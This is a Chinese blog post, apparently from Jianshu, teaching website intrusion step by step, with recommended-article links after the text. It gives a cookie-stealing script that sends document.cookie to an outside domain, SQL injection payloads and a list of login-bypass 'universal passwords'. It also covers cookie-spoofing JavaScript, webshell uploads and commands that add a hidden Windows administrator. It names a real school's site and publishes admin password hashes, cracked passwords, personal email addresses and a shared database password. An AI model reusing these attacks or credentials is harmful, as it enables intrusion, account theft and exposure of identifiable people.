危险漫步

1.网站入侵概述及准备工作

windows.open('http://域名/info.asp=?msg='+document.cookie)

一、网站入侵的定义

windows.open('http://域名/info.asp=?msg='+document.cookie)

二、网站入侵之后

安全漏洞提交、挂黑页、挂马、获得网站关键数据。

三、网站入侵

网站入侵是一门综合学问,融合了80端口入侵、脚本渗透、服务器渗透、社会工程学、加密解密等等技术。

四、什么是网站服务器

五、常见的网站服务器类型

Windows,Linux,Unix。

六、网站入侵前要做的准备

七、网站常见的程序

asp php .net jsp

2.明小子SQL注入检测入侵

一、熟悉注入工具

二、进行注入点检测

三、进行注入

四、猜解数据库表名

五、猜解数据库列名

六、检测结果

七、MD5解密

八、扫描后台

九、登录OK

注:程序存在杀毒软件误报情况,请关闭杀毒软件。


3.啊DSQL注入检测入侵

一、熟悉注入工具

二、进行注入点检测

三、进行注入

四、猜解数据库表名

五、猜解数据库列名

六、检测结果

七、MD5解密

八、扫描后台

九、登录OK

十、啊d和明小子的区别

注:程序存在杀毒软件误报情况,无须担心。

4.ASP大马数据库备份上传

一、asp大马介绍

二、上传大马

三、获得大马所在地址

四、备份数据库更改大马后缀

五、大马访问OK

5.google hacking技术

一、介绍google hacking概念

Google Hacking的含义原指利用Google搜索引擎搜索信息来进行入侵的技术和行为

现指利用各种搜索引擎搜索信息来进行入侵的技术和行为

二、google hacking常见指令

intitle:搜索网页标题中包含有特定字符的网页。例如输入“intitle: cbi”,这样网页标题中带有cbi的网页都会被搜索出来

inurl:搜索包含有特定字符的URL。例如输入“inurl:cbi”,则可以找到带有cbi字符的URL

intext:搜索网页正文内容中的指定字符,例如输入“intext:pdf”。这个语法类似我们平时在某些网站中使用的“文章内容搜索”功能

Site:找到与指定网站有联系的URL。例如输入“Site:www.58.com”。所有和这个网站有联系的URL都会被显示

7.一句话ASP木马上传拿Webshell

必备条件:1.拿到数据库地址 2.数据库文件为asp结尾

一、寻找可写入数据库的方式

二、插入一句话木马到数据库

三、用一句话木马上传客户端上传大马

四、访问OK

8.SQL手工注入原理

一、什么是SQL注入

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。

二、判定是否存在注入点

and 1=1  and 1=2

三、猜解数据库表名

and 0<>(select count(*) from 表名)

四、猜解数据库列名

and (select count(列名) from 猜到的表名)>0

五、猜解字段长度

and (select top 1 len(猜到的列名) from 猜到的表名)>0

六、猜解字符内容

and 1=(select count(*) from [猜到的表名] where left(猜到的列名,1)='a')


9.万能密码及默认密码登录后台

一、万能密码原理

万能密码漏洞都是因为提交字符未加过滤或过滤不严而导致的。

例如后台系统验证密码要求用户输入的密码和数据库里面的匹配,而用万能密码的方式,就是将验证的语句改成了验证成功的,逻辑运算符AND和OR的运算优先次序是:先运算AND运算符在运算OR运算符,这个漏洞是发生在登陆口,只有登陆口才会出现这样的漏洞。

二、万能密码大全

ASP 万能密码

1:"or "a"="a

2:')or('a'='a

3:or 1=1--

4:'or 1=1--

5:a'or' 1=1--

6:"or 1=1--

7:'or'a'='a

8:"or"="a'='a

9:'or''='

10:'or'='or'

11:1 or '1'='1'=1

12:1 or '1'='1' or 1=1

13:'OR 1=1%00

14:"or 1=1%00

15:'xor

16:用户名 ' UNION Select 1,1,1 FROM admin Where ''=' (替换表名admin) 密码 1

17: admin' or 'a'='a 密码随便

PHP 万能密码

1:'or 1=1/*

2:User: something

Pass: ' or '1'='1

JSP 万能密码:

1:1'or'1'='1:

2:admin' or 1=1/*

默认密码:

1:admin

2:admin888

3:123456

4:123123

5:(域名)

10.szwyadmin程序cookies欺骗漏洞

一、搜索关键字

inurl:szwyadmin/login.asp

二、进入执行代码

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));javascript:alert(document.cookie="admindj="+escape("1"));

三、更改文件名

login.asp改为admin_index.asp

四、访问OK

11.跨站攻击网站演练

一、跨站攻击的概念

跨站攻击:即Cross Site Script Execution(通常简写为XSS),攻击者输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。

二、跨站攻击的演示

------------------------------------------------------------------------------------

alert("这个是跨站

alert("这个是跨站攻击")

12.eWebEditor编辑器入侵网站提权

一、介绍eWebEditor

eWebEditor是一个基于浏览器的在线HTML编辑器,WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框

二、获得eWebEditor后台登录地址

ewebeditor/Admin_Login.asp

三、登录

四、拷贝样式

五、修改样式设置

六、上传小马

七、访问OK

13.cookies欺骗登录管理员账号

一、介绍Cookies

Cookies就是服务器暂时存放在你的电脑里的资料(.txt格式的文本文件),好让服务器用来辨认你的计算机。当你在浏览网站的时候,Web服务器会先送一小小资料放在你的计算机上,Cookies 会把你在网站上所打的文字或是一些选择都记录下来。当下次你再访问同一个网站,Web服务器会先看看有没有它上次留下的Cookies资料,有的话,就会依据Cookie里的内容来判断使用者,送出特定的网页内容给你。

二、Cookies所在位置

HKEY_CRURRENT_USER\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVESION\EXPLORER\USER SHELL FOLDERS

Cookies  这里是Cookies的实际存储位置

一般来说保存位置是:C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Cookies

三、注册登录

四、找到管理员账号

五、修改Cookies信息

六、访问OK

14.入侵检测OHO系统教育网站

目标站点:连云港海滨中学

一、原理讲解

二、操作实例

默认用户

35b469e289663f9c5ef4bac870e4724f(解密后:321dsaabc)hrbole@163.com

cf94920c73fd59eb2ffbf7048794fe54(解密后:`1221`)lixz1@yahoo.cn

e10adc3949ba59abbe56e057f20f883e(解密后:123456)xiaoshu44877@yahoo.cn

246cc3dcb397f4a73da6fd53703211c9(解密后:gy15996372475)geying10@126.com

f813751a16d7862ac4b0f5ae28168124(解密后:84884291)84884291@qq.com

这些都是统一的管理员账号密码,大部分欧虎的站后台都能登陆。

还有很多账号,就不列举了。

后台地址url/aaa.php或url/home.php或/admin.php联系我我可以提供更多的账号以供测试

google搜索(inurl:php intext:技术支持:江苏连邦信息技术有限公司)或:intitle:全图形化应用系统开发环境 V2010

即可找到大量使用此系统的站点。

统一的数据库账号:root或root1 密码:ohoad56175617

15.webshell提权服务器登录

目标站点:www.weixianmanbu.com

一、进入webshell

二、查看执行权限

三、查看端口及用户

查看端口:netstat -an

查看用户:net user

四、执行创建用户及提权

创建用户:net user weixian 123123 /add

加入管理组:net localgroup administrators weixian /add

激活用户:net user weixian /active:yes

查看服务器ip地址:ping www.weixianmanbu.com

五、登录OK

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • 注入攻击的分类 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传...
    查无此人asdasd阅读 1,704评论 0 5
  • [SQL注入攻击] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式...
    James黄杰阅读 2,754评论 0 30
  • Spring Cloud为开发人员提供了快速构建分布式系统中一些常见模式的工具(例如配置管理,服务发现,断路器,智...
    卡卡罗2017阅读 135,246评论 19 139
  • 我是一个孤儿,也许是重男轻女的结果,也许是男欢女爱又不能负责的产物。 是哲野把我拣回家的。 那年他落实政策自农村回...
    凌子卿阅读 303评论 0 3
  • 当孩子出生后,你觉得会遇到什么样的危险?对于一个新手妈妈,其实对这个问题是回答不出来的。因为在大家的认知中,只要孩...
    美人唐阅读 9,508评论 0 1